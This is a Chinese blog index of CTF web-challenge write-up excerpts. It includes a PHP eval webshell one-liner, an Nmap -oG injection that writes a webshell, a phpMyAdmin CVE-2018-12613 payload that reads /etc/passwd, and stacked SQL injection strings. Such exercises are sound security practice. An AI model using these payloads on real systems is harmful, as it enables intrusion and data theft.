随笔分类 - CTF_刷题
摘要:题目给了一个登录界面: 尝试用Burp抓包 题目提示很明显XML注入 本题经过大量尝试,是查看hosts文件从而攻击内网 首先读取文件,得到内网IP段 然后访问该ip 发现没有结果,那么对内网ip进行扫描爆破 最后在ip=12的时候发现flag
阅读全文
posted @ 2020-09-15 10:40
星火不辍
摘要:首先通过扫描发现index.php.swp备份文件 打开得到代码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^
阅读全文
posted @ 2020-09-11 11:22
星火不辍
摘要:题目给了一个网站的模板 通过扫描进入后台admin.php 默认用户名admin 默认密码搜索得shopxo 在当前主题那里下载默认主题 然后在主题里面传一个一句话木马 <?php @eval($_POST[a]); phpinfo(); ?> 用菜刀连接(路径可在浏览器查看源码中找到) 打开fla
阅读全文
posted @ 2020-09-10 20:56
星火不辍
摘要:扫描目录 看到 robots.txt 访问 在响应头里面找到了提示信息 查看 源代码如下: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //le
阅读全文
posted @ 2020-09-10 15:29
星火不辍
摘要:Nmap -oG 可以写入文件 因此我们可以写入一句话木马 payload如下 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 结果回显hacker php被过滤 因此考虑用短标签绕过 ' <?= @eval($_POST["pd"]);?> -oG
阅读全文
posted @ 2020-09-04 16:15
星火不辍
摘要:抓包看一下 date是一个函数 后面是他的参数 由此形式我们猜测使用了 call_user_func()函数 于是我们尝试读取源代码 查看源代码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open
阅读全文
posted @ 2020-08-31 11:23
星火不辍
摘要:源代码如下 package main import ( "fmt" "io/ioutil" "log" "net/http" "net/url" "strings" ) var ( secret = "xiaomo.wabzsy" banner = "Golang HTTP Server (v2.3
阅读全文
posted @ 2020-06-21 09:42
星火不辍
摘要:知识点:php反序列化字符串逃逸 题目打开是源代码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
阅读全文
posted @ 2020-05-31 09:51
星火不辍
摘要:知识点: preg_replace()使用的/e模式可以存在远程执行代码 解析见链接:https://xz.aliyun.com/t/2557 看题目 首先是一段源代码: text是PHP的DATA伪协议 file是PHP的filter伪协议 payload: 得到第二段源代码: payload如下
阅读全文
posted @ 2020-05-23 11:32
星火不辍
摘要:考查的知识点: base_convert() 函数:在任意进制之间转换数字。 dechex() 函数:把十进制转换为十六进制。 hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符 php动态函数:php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数 题目
阅读全文
posted @ 2020-05-22 15:34
星火不辍
摘要:phpMyadmin(CVE 2018 12613)后台任意文件包含漏洞 影响版本:4.8.0——4.8.1 payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd 本题payload:
阅读全文
posted @ 2020-04-27 09:10
星火不辍
摘要:堆叠注入 首先查询列数 列数为2 union等关键词被过滤 正常注入无法进行 考虑堆叠注入——使用分号结束上一个语句再叠加其他语句一起执行; 然后 sql 1' and 1=2;desc sql 1'; HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRS
阅读全文
posted @ 2020-04-27 08:50
星火不辍
摘要:本题考查报错注入 注入过程如下所示: 这样只能出来一半的flag,另一半用left()right()语句查询拼接
阅读全文
posted @ 2020-04-27 08:20
星火不辍
摘要:又是SSTI模板注入类题目 源代码如下: 代码中给出了两个路由,第一个是用来显示源代码的 第二个路由在/shrine/路径下提交参数,模板中设定{{ }}包括的内容为后端变量,% %包括的内容为逻辑语句 简单测试 在没有黑名单过滤的情况下 我们可以使用config,传入 config,或者使用sel
阅读全文
posted @ 2020-04-14 11:35
星火不辍
摘要:源代码 int和string是无法直接比较的,php会将string转换成int然后再进行比较,转换成int比较时只保留数字,第一个字符串之后的所有内容会被截掉 所以相当于key只要等于123就满足条件了
阅读全文
posted @ 2020-04-14 11:02
星火不辍
摘要:Githack获取源码 php动态变量 $a="b"; $b="c"; echo $$a; 结果输出:c; 解释:$$a=${$a}=$b=c 首先post:$flag=flag 这样就变成了$$flag = flag 然后GET:?yds=flag $x为yds,$y为flag,所以$$x就是$y
阅读全文
posted @ 2020-04-08 09:32
星火不辍
摘要:考到了一个知识点 当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据在数据库中。 union select测试发现有三列 所以我们在这里进行绕过,即输入admin,密码设置为123456,将123456MD5加密后放进union select 查询中 也就是当name代入查询查询时,在MySQ
阅读全文
posted @ 2020-04-08 09:07
星火不辍
摘要:搬运一个师傅的header参数总结 https://www.cnblogs.com/benbenfishfish/p/5821091.html
阅读全文
posted @ 2020-04-01 11:30
星火不辍
摘要:源码 PHP '; die("xixi~ no flag"); } else { $txt = base64_encode(file_get_contents($file)); echo ""; echo ""; } echo $cmd; echo ""; if (preg_match("/ls|b
阅读全文
posted @ 2020-04-01 11:17
星火不辍
浙公网安备 33010602011771号